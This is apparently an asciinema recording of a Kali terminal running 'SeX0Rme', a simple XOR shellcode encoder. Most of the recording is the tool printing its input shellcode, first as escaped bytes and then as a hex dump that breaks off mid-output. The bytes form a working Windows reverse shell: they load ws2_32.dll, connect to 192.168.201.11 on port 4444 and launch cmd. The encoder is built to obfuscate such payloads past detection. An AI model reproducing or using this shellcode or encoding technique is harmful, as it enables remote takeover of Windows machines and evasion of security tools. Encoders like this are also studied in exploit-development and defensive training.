{"version": 2, "width": 117, "height": 49, "timestamp": 1643905384, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[0.068974, "o", "                                                                                                                     \r\r\u001b]0;root@kali: ~/Documents/SeX0Rme\u0007"]
[0.092275, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Documents/SeX0Rme\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[0.092551, "o", "\u001b[?1h\u001b="]
[0.09335, "o", "\u001b[?2004h"]
[1.283363, "o", "\u001b[32m.\u001b[39m"]
[1.284193, "o", "\b\u001b[32m.\u001b[39m\u001b[38;2;153;153;153m/enc\u001b[39m\b\b\b\b"]
[1.474511, "o", "\b\u001b[39m\u001b[4m.\u001b[39m\u001b[4m/\u001b[24m"]
[1.879763, "o", "\b\b\u001b[4m.\u001b[4m/\u001b[39m\u001b[4me\u001b[24m"]
[2.183686, "o", "\b\u001b[4me\u001b[39m\u001b[4mn\u001b[24m"]
[2.689478, "o", "\b\b\b\b\u001b[24m\u001b[32m.\u001b[24m\u001b[32m/\u001b[24m\u001b[32me\u001b[24m\u001b[32mn\u001b[32mc\u001b[39m"]
[2.768481, "o", "\u001b[?1l\u001b>"]
[2.769152, "o", "\u001b[?2004l\r\r\n"]
[2.771011, "o", "\u001b[01;33m\r\n                         _\\|/_\r\n                         (o o)\r\n           +----------oOO-{_}-OOo----------+\r\n                    \t\t\t             \r\n                        SeX0Rme\t\t\t\t \t\r\n                  -=---------------=-\r\n\r\n                   Simple XOR Encoder       \r\n                    Author: @xen0vas    \r\n                                         \r\n\u001b[0m\u001b[01;33m\r\n\r\n[-] Original Shellcode:\r\n\r\n\r\n\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xc9\u001b[0m\u001b[0;36m\\x64\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x41\u001b[0m\u001b[0;36m\\x30\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x40\u001b[0m\u001b[0;36m\\x0c\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x70\u001b[0m\u001b[0;36m\\x14\u001b[0m\u001b[0;36m\\xad\u001b[0m\u001b[0;36m\\x96\u001b[0m\u001b[0;36m\\xad\u001b[0m\u001b[0;36m\\x96\u001b[0m\u001b[0;36m\\xad\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x58\u001b[0m\u001b[0;36m\\x10\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x53\u001b[0m\u001b[0;36m\\x3c\u001b[0m\u001b[0;36m\\x01\u001b[0m\u001b[0;36m\\xda\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x78\u001b[0m\u001b[0;36m\\x01\u001b[0m\u001b[0;36m\\xda\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x72\u001b[0m\u001b[0;36m\\x20\u001b[0m\u001b[0;36m\\x01\u001b[0m\u001b[0;36m\\xde\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xc9\u001b[0m\u001b[0;36m\\x41\u001b[0m\u001b[0;36m\\xad\u001b[0m\u001b[0;36m\\x01\u001b[0m\u001b[0;36"]
[2.771056, "o", "m\\xd8\u001b[0m\u001b[0;36m\\x81\u001b[0m\u001b[0;36m\\x38\u001b[0m\u001b[0;36m\\x47\u001b[0m\u001b[0;36m\\x65\u001b[0m\u001b[0;36m\\x74\u001b[0m\u001b[0;36m\\x50\u001b[0m\u001b[0;36m\\x75\u001b[0m\u001b[0;36m\\xf4\u001b[0m\u001b[0;36m\\x81\u001b[0m\u001b[0;36m\\x78\u001b[0m\u001b[0;36m\\x04\u001b[0m\u001b[0;36m\\x72\u001b[0m\u001b[0;36m\\x6f\u001b[0m\u001b[0;36m\\x63\u001b[0m\u001b[0;36m\\x41\u001b[0m\u001b[0;36m\\x75\u001b[0m\u001b[0;36m\\xeb\u001b[0m\u001b[0;36m\\x81\u001b[0m\u001b[0;36m\\x78\u001b[0m\u001b[0;36m\\x08\u001b[0m\u001b[0;36m\\x64\u001b[0m\u001b[0;36m\\x64\u001b[0m\u001b[0;36m\\x72\u001b[0m\u001b[0;36m\\x65\u001b[0m\u001b[0;36m\\x75\u001b[0m\u001b[0;36m\\xe2\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x72\u001b[0m\u001b[0;36m\\x24\u001b[0m\u001b[0;36m\\x01\u001b[0m\u001b[0;36m\\xde\u001b[0m\u001b[0;36m\\x66\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x0c\u001b[0m\u001b[0;36m\\x4e\u001b[0m\u001b[0;36m\\x49\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x72\u001b[0m\u001b[0;36m\\x1c\u001b[0m\u001b[0;36m\\x01\u001b[0m\u001b[0;36m\\xde\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x14\u001b[0m\u001b[0;36m\\x8e\u001b[0m\u001b[0;36m\\x01\u001b[0m\u001b[0;36m\\xda\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xc9\u001b[0m\u001b[0;36m\\x53\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x51\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x72\u001b[0m\u001b[0;36m\\x79\u001b[0m\u001b[0;36m\\x41\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x4c\u001b[0m\u001b[0;36m\\x69\u001b[0m\u001b[0;36m\\x62\u001b[0m\u001b[0;36m\\x72\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x4c\u001b[0m\u001b[0;36m\\x6f\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x64\u001b[0m\u001b[0;36m\\x54\u001b[0m\u001b[0;36m\\x5"]
[2.771184, "o", "3\u001b[0m\u001b[0;36m\\x89\u001b[0m\u001b[0;36m\\xde\u001b[0m\u001b[0;36m\\xff\u001b[0m\u001b[0;36m\\xd2\u001b[0m\u001b[0;36m\\x83\u001b[0m\u001b[0;36m\\xc4\u001b[0m\u001b[0;36m\\x0c\u001b[0m\u001b[0;36m\\x5a\u001b[0m\u001b[0;36m\\x50\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x66\u001b[0m\u001b[0;36m\\xba\u001b[0m\u001b[0;36m\\x6c\u001b[0m\u001b[0;36m\\x6c\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x33\u001b[0m\u001b[0;36m\\x32\u001b[0m\u001b[0;36m\\x2e\u001b[0m\u001b[0;36m\\x64\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x77\u001b[0m\u001b[0;36m\\x73\u001b[0m\u001b[0;36m\\x32\u001b[0m\u001b[0;36m\\x5f\u001b[0m\u001b[0;36m\\x54\u001b[0m\u001b[0;36m\\xff\u001b[0m\u001b[0;36m\\xd0\u001b[0m\u001b[0;36m\\x83\u001b[0m\u001b[0;36m\\xc4\u001b[0m\u001b[0;36m\\x10\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x54\u001b[0m\u001b[0;36m\\x24\u001b[0m\u001b[0;36m\\x04\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x75\u001b[0m\u001b[0;36m\\x70\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x66\u001b[0m\u001b[0;36m\\x81\u001b[0m\u001b[0;36m\\x6c\u001b[0m\u001b[0;36m\\x24\u001b[0m\u001b[0;36m\\x02\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x74\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x72\u001b[0m\u001b[0;36m\\x74\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x57\u001b[0m\u001b[0;36m\\x53\u001b[0m\u001b[0;36m\\x41\u001b[0m\u001b[0;36m\\x53\u001b[0m\u001b[0;36m\\x54\u001b[0m\u001b[0;36m\\x50\u001b[0m\u001b[0;36m\\x89\u001b[0m\u001b[0;36m\\xc7\u001b[0m\u001b[0;36m\\xff\u001b[0m\u001b[0;36m\\xd2\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xdb\u001b[0m\u001b[0;36m\\x66\u001b[0m\u001b[0;36m\\xbb\u001b[0m\u001b[0;36m\\x90\u001b[0"]
[2.771217, "o", "m\u001b[0;36m\\x01\u001b[0m\u001b[0;36m\\x29\u001b[0m\u001b[0;36m\\xdc\u001b[0m\u001b[0;36m\\x54\u001b[0m\u001b[0;36m\\x53\u001b[0m\u001b[0;36m\\xff\u001b[0m\u001b[0;36m\\xd0\u001b[0m\u001b[0;36m\\x83\u001b[0m\u001b[0;36m\\xc4\u001b[0m\u001b[0;36m\\x10\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xdb\u001b[0m\u001b[0;36m\\x80\u001b[0m\u001b[0;36m\\xc3\u001b[0m\u001b[0;36m\\x04\u001b[0m\u001b[0;36m\\x6b\u001b[0m\u001b[0;36m\\xdb\u001b[0m\u001b[0;36m\\x64\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x14\u001b[0m\u001b[0;36m\\x1c\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x74\u001b[0m\u001b[0;36m\\x41\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x66\u001b[0m\u001b[0;36m\\x81\u001b[0m\u001b[0;36m\\x6c\u001b[0m\u001b[0;36m\\x24\u001b[0m\u001b[0;36m\\x02\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x6f\u001b[0m\u001b[0;36m\\x63\u001b[0m\u001b[0;36m\\x6b\u001b[0m\u001b[0;36m\\x65\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x57\u001b[0m\u001b[0;36m\\x53\u001b[0m\u001b[0;36m\\x41\u001b[0m\u001b[0;36m\\x53\u001b[0m\u001b[0;36m\\x54\u001b[0m\u001b[0;36m\\x89\u001b[0m\u001b[0;36m\\xf8\u001b[0m\u001b[0;36m\\x50\u001b[0m\u001b[0;36m\\xff\u001b[0m\u001b[0;36m\\xd2\u001b[0m\u001b[0;36m\\x57\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xc9\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\xb2\u001b[0m\u001b[0;36m\\x06\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x41\u001b[0m\u001b[0;36m\\x51\u001b[0m\u001b[0;36m\\x41\u001b[0m\u001b[0;36m\\x51\u001b[0m\u001b[0;36m\\xff\u001b[0m\u001b[0;36m\\xd0\u001b[0m\u001b[0;36m\\x91\u001b[0m\u001b[0;36m\\x5f\u001b[0m\u001b[0;36m\\x83\u001b[0m\u001b[0;36m\\xc4\u001b[0m\u001b[0"]
[2.771237, "o", ";36m\\x10\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xdb\u001b[0m\u001b[0;36m\\x80\u001b[0m\u001b[0;36m\\xc3\u001b[0m\u001b[0;36m\\x04\u001b[0m\u001b[0;36m\\x6b\u001b[0m\u001b[0;36m\\xdb\u001b[0m\u001b[0;36m\\x63\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x14\u001b[0m\u001b[0;36m\\x1c\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x65\u001b[0m\u001b[0;36m\\x63\u001b[0m\u001b[0;36m\\x74\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x66\u001b[0m\u001b[0;36m\\x83\u001b[0m\u001b[0;36m\\x6c\u001b[0m\u001b[0;36m\\x24\u001b[0m\u001b[0;36m\\x03\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x63\u001b[0m\u001b[0;36m\\x6f\u001b[0m\u001b[0;36m\\x6e\u001b[0m\u001b[0;36m\\x6e\u001b[0m\u001b[0;36m\\x54\u001b[0m\u001b[0;36m\\x57\u001b[0m\u001b[0;36m\\x87\u001b[0m\u001b[0;36m\\xcd\u001b[0m\u001b[0;36m\\xff\u001b[0m\u001b[0;36m\\xd2\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\xc0\u001b[0m\u001b[0;36m\\xa8\u001b[0m\u001b[0;36m\\xc9\u001b[0m\u001b[0;36m\\x0b\u001b[0m\u001b[0;36m\\x66\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x11\u001b[0m\u001b[0;36m\\x5c\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xdb\u001b[0m\u001b[0;36m\\x80\u001b[0m\u001b[0;36m\\xc3\u001b[0m\u001b[0;36m\\x02\u001b[0m\u001b[0;36m\\x66\u001b[0m\u001b[0;36m\\x53\u001b[0m\u001b[0;36m\\x89\u001b[0m\u001b[0;36m\\xe2\u001b[0m\u001b[0;36m\\x6a\u001b[0m\u001b[0;36m\\x10\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x55\u001b[0m\u001b[0;36m\\x87\u001b[0m\u001b[0;36m\\xef\u001b[0m\u001b[0;36m\\xff\u001b[0m\u001b[0;36m\\xd0\u001b[0m\u001b[0;36m\\x83\u001b[0m\u001b[0;36m\\xc4\u001b[0m\u001b[0;36m\\x14\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xdb\u001b[0m\u001b[0;36m\\x80\u001b[0m\u001b[0;36m\\xc3\u001b[0m\u001b[0;36m\\x04\u001b[0m\u001b[0;36m"]
[2.771255, "o", "\\x6b\u001b[0m\u001b[0;36m\\xdb\u001b[0m\u001b[0;36m\\x62\u001b[0m\u001b[0;36m\\x8b\u001b[0m\u001b[0;36m\\x14\u001b[0m\u001b[0;36m\\x1c\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x73\u001b[0m\u001b[0;36m\\x41\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x81\u001b[0m\u001b[0;36m\\x6c\u001b[0m\u001b[0;36m\\x24\u001b[0m\u001b[0;36m\\x02\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x00\u001b[0m\u001b[0;36m\\x00\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x6f\u001b[0m\u001b[0;36m\\x63\u001b[0m\u001b[0;36m\\x65\u001b[0m\u001b[0;36m\\x73\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x74\u001b[0m\u001b[0;36m\\x65\u001b[0m\u001b[0;36m\\x50\u001b[0m\u001b"]
[2.771289, "o", "[0;36m\\x72\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x43\u001b[0m\u001b[0;36m\\x72\u001b[0m\u001b[0;36m\\x65\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x54\u001b[0m\u001b[0;36m\\x89\u001b[0m\u001b[0;36m\\xf5\u001b[0m\u001b[0;36m\\x55\u001b[0m\u001b[0;36m\\xff\u001b[0m\u001b[0;36m\\xd2\u001b[0m\u001b[0;36m\\x50\u001b[0m\u001b[0;36m\\x8d\u001b[0m\u001b[0;36m\\x28\u001b[0m\u001b[0;36m\\x68\u001b[0m\u001b[0;36m\\x63\u001b[0m\u001b[0;36m\\x6d\u001b[0m\u001b[0;36m\\x64\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x66\u001b[0m\u001b[0;36m\\x83\u001b[0m\u001b[0;36m\\x6c\u001b[0m\u001b[0;36m\\x24\u001b[0m\u001b[0;36m\\x03\u001b[0m\u001b[0;36m\\x61\u001b[0m\u001b[0;36m\\x89\u001b[0m\u001b[0;36m\\xe1\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xd2\u001b[0m\u001b[0;36m\\x83\u001b[0m\u001b[0;36m\\xec\u001b[0m\u001b[0;36m\\x10\u001b[0m\u001b[0;36m\\x89\u001b[0m\u001b[0;36m\\xe3\u001b[0m\u001b[0;36m\\x57\u001b[0m\u001b[0;36m\\x57\u001b[0m\u001b[0;36m\\x57\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xc0\u001b[0m\u001b[0;36m\\x40\u001b[0m\u001b[0;36m\\xc1\u001b[0m\u001b[0;36m\\xc0\u001b[0m\u001b[0;36m\\x08\u001b[0m\u001b[0;36m\\x50\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xc0\u001b[0m\u001b[0;36m\\x04\u001b[0m\u001b[0;36m\\x2c\u001b[0m\u001b[0;36m\\x50\u001b[0m\u001b[0;36m\\x89\u001b[0m\u001b[0;36m\\xe0\u001b[0m\u001b[0;36m\\x53\u001b[0m\u001b[0;36m\\x50\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;3"]
[2.771315, "o", "6m\\x52\u001b[0m\u001b[0;36m\\x31\u001b[0m\u001b[0;36m\\xc0\u001b[0m\u001b[0;36m\\x40\u001b[0m\u001b[0;36m\\x50\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\x51\u001b[0m\u001b[0;36m\\x52\u001b[0m\u001b[0;36m\\xff\u001b[0m\u001b[0;36m\\xd5\u001b[0m\u001b[0;32m"]
[2.77134, "o", "\r\n"]
[2.771359, "o", "\r\n"]
[2.771375, "o", "----------------------"]
[2.771433, "o", "\r\n"]
[2.771459, "o", "\r\n"]
[2.771494, "o", "\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mc9\u001b[0m\u001b[0;36m64\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m41\u001b[0m\u001b[0;36m30\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m40\u001b[0m\u001b[0;36m0c\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m70\u001b[0m\u001b[0;36m14\u001b[0m\u001b[0;36mad\u001b[0m\u001b[0;36m96\u001b[0m\u001b[0;36mad\u001b[0m\u001b[0;36m96\u001b[0m\u001b[0;36mad\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m58\u001b[0m\u001b[0;36m10\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m53\u001b[0m\u001b[0;36m3c\u001b[0m\u001b[0;36m01\u001b[0m\u001b[0;36mda\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m78\u001b[0m\u001b[0;36m01\u001b[0m\u001b[0;36mda\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m72\u001b[0m\u001b[0;36m20\u001b[0m\u001b[0;36m01\u001b[0m\u001b[0;36mde\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mc9\u001b[0m\u001b[0;36m41\u001b[0m\u001b[0;36mad\u001b[0m\u001b[0;36m01\u001b[0m\u001b[0;36md8\u001b[0m\u001b[0;36m81\u001b[0m\u001b[0;36m38\u001b[0m\u001b[0;36m47\u001b[0m\u001b[0;36m65\u001b[0m\u001b[0;36m74\u001b[0m\u001b[0;36m50\u001b[0m\u001b[0;36m75\u001b[0m\u001b[0;36mf4\u001b[0m\u001b[0;36m81\u001b[0m\u001b[0;36m78\u001b[0m\u001b[0;36m04\u001b[0m\u001b[0;36m72\u001b[0m\u001b[0;36m6f\u001b[0m\u001b[0;36m63\u001b[0m\u001b[0;36m41\u001b[0m\u001b[0;36m75\u001b[0m\u001b[0;36meb\u001b[0m\u001b[0;36m81\u001b[0m\u001b[0;36m78\u001b[0m\u001b[0;36m08\u001b[0m\u001b[0;36m64\u001b[0m\u001b[0;36m64\u001b[0m\u001b[0;36m72\u001b[0m\u001b[0;36m65\u001b[0m\u001b[0;36m75\u001b[0m\u001b[0;36me2\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m72\u001b[0m\u001b[0;36m24\u001b[0m\u001b[0;36m01\u001b[0m\u001b[0;36mde\u001b[0m\u001b[0;36m66\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m0c\u001b[0m\u001b[0;36m4e\u001b[0m\u001b[0;36m49\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36"]
[2.77153, "o", "m72\u001b[0m\u001b[0;36m1c\u001b[0m\u001b[0;36m01\u001b[0m\u001b[0;36mde\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m14\u001b[0m\u001b[0;36m8e\u001b[0m\u001b[0;36m01\u001b[0m\u001b[0;36mda\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mc9\u001b[0m\u001b[0;36m53\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m51\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m72\u001b[0m\u001b[0;36m79\u001b[0m\u001b[0;36m41\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m4c\u001b[0m\u001b[0;36m69\u001b[0m\u001b[0;36m62\u001b[0m\u001b[0;36m72\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m4c\u001b[0m\u001b[0;36m6f\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m64\u001b[0m\u001b[0;36m54\u001b[0m\u001b[0;36m53\u001b[0m\u001b[0;36m89\u001b[0m\u001b[0;36mde\u001b[0m\u001b[0;36mff\u001b[0m\u001b[0;36md2\u001b[0m\u001b[0;36m83\u001b[0m\u001b[0;36mc4\u001b[0m\u001b[0;36m0c\u001b[0m\u001b[0;36m5a\u001b[0m\u001b[0;36m50\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m66\u001b[0m\u001b[0;36mba\u001b[0m\u001b[0;36m6c\u001b[0m\u001b[0;36m6c\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m33\u001b[0m\u001b[0;36m32\u001b[0m\u001b[0;36m2e\u001b[0m\u001b[0;36m64\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m77\u001b[0m\u001b[0;36m73\u001b[0m\u001b[0;36m32\u001b[0m\u001b[0;36m5f\u001b[0m\u001b[0;36m54\u001b[0m\u001b[0;36mff\u001b[0m\u001b[0;36md0\u001b[0m\u001b[0;36m83\u001b[0m\u001b[0;36mc4\u001b[0m\u001b[0;36m10\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m54\u001b[0m\u001b[0;36m24\u001b[0m\u001b[0;36m04\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m75\u001b[0m\u001b[0;36m70\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m66\u001b[0m\u001b[0;36m81\u001b[0m\u001b[0;36m6c\u001b[0m\u001b[0;36m24\u001b[0m\u001b[0;36m02\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0"]
[2.771731, "o", ";36m74\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m72\u001b[0m\u001b[0;36m74\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m57\u001b[0m\u001b[0;36m53\u001b[0m\u001b[0;36m41\u001b[0m\u001b[0;36m53\u001b[0m\u001b[0;36m54\u001b[0m\u001b[0;36m50\u001b[0m\u001b[0;36m89\u001b[0m\u001b[0;36mc7\u001b[0m\u001b[0;36mff\u001b[0m\u001b[0;36md2\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mdb\u001b[0m\u001b[0;36m66\u001b[0m\u001b[0;36mbb\u001b[0m\u001b[0;36m90\u001b[0m\u001b[0;36m01\u001b[0m\u001b[0;36m29\u001b[0m\u001b[0;36mdc\u001b[0m\u001b[0;36m54\u001b[0m\u001b[0;36m53\u001b[0m\u001b[0;36mff\u001b[0m\u001b[0;36md0\u001b[0m\u001b[0;36m83\u001b[0m\u001b[0;36mc4\u001b[0m\u001b[0;36m10\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mdb\u001b[0m\u001b[0;36m80\u001b[0m\u001b[0;36mc3\u001b[0m\u001b[0;36m04\u001b[0m\u001b[0;36m6b\u001b[0m\u001b[0;36mdb\u001b[0m\u001b[0;36m64\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m14\u001b[0m\u001b[0;36m1c\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m74\u001b[0m\u001b[0;36m41\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m66\u001b[0m\u001b[0;36m81\u001b[0m\u001b[0;36m6c\u001b[0m\u001b[0;36m24\u001b[0m\u001b[0;36m02\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m6f\u001b[0m\u001b[0;36m63\u001b[0m\u001b[0;36m6b\u001b[0m\u001b[0;36m65\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m57\u001b[0m\u001b[0;36m53\u001b[0m\u001b[0;36m41\u001b[0m\u001b[0;36m53\u001b[0m\u001b[0;36m54\u001b[0m\u001b[0;36m89\u001b[0m\u001b[0;36mf8\u001b[0m\u001b[0;36m50\u001b[0m\u001b[0;36mff\u001b[0m\u001b[0;36md2\u001b[0m\u001b[0;36m57\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mc9\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36mb2\u001b[0m\u001b[0;36m06\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m41\u001b[0m"]
[2.771759, "o", "\u001b[0;36m51\u001b[0m\u001b[0;36m41\u001b[0m\u001b[0;36m51\u001b[0m\u001b[0;36mff\u001b[0m\u001b[0;36md0\u001b[0m\u001b[0;36m91\u001b[0m\u001b[0;36m5f\u001b[0m\u001b[0;36m83\u001b[0m\u001b[0;36mc4\u001b[0m\u001b[0;36m10\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mdb\u001b[0m\u001b[0;36m80\u001b[0m\u001b[0;36mc3\u001b[0m\u001b[0;36m04\u001b[0m\u001b[0;36m6b\u001b[0m\u001b[0;36mdb\u001b[0m\u001b[0;36m63\u001b[0m\u001b[0;36m8b\u001b[0m\u001b[0;36m14\u001b[0m\u001b[0;36m1c\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m65\u001b[0m\u001b[0;36m63\u001b[0m\u001b[0;36m74\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m66\u001b[0m\u001b[0;36m83\u001b[0m\u001b[0;36m6c\u001b[0m\u001b[0;36m24\u001b[0m\u001b[0;36m03\u001b[0m\u001b[0;36m61\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m63\u001b[0m\u001b[0;36m6f\u001b[0m\u001b[0;36m6e\u001b[0m\u001b[0;36m6e\u001b[0m\u001b[0;36m54\u001b[0m\u001b[0;36m57\u001b[0m\u001b[0;36m87\u001b[0m\u001b[0;36mcd\u001b[0m\u001b[0;36mff\u001b[0m\u001b[0;36md2\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36mc0\u001b[0m\u001b[0;36ma8\u001b[0m\u001b[0;36mc9\u001b[0m\u001b[0;36m0b\u001b[0m\u001b[0;36m66\u001b[0m\u001b[0;36m68\u001b[0m\u001b[0;36m11\u001b[0m\u001b[0;36m5c\u001b[0m\u001b[0;36m31\u001b[0m\u001b[0;36mdb\u001b[0m\u001b[0;36m80\u001b[0m\u001b[0;36mc3\u001b[0m\u001b[0;36m02\u001b[0m\u001b[0;36m66\u001b[0m\u001b[0;36m53\u001b[0m\u001b[0;36m89\u001b[0m\u001b[0;36me2\u001b[0m\u001b[0;36m6a\u001b[0m\u001b[0;36m10\u001b[0m\u001b[0;36m52\u001b[0m\u001b[0;36m55\u001b[0m\u001b[0;36m87\u001b[0m\u001b[0;36mef\u001b[0m\u001b[0;36mff\u001b[0m\u001b[0;36md0\u001b[0m\u001b[0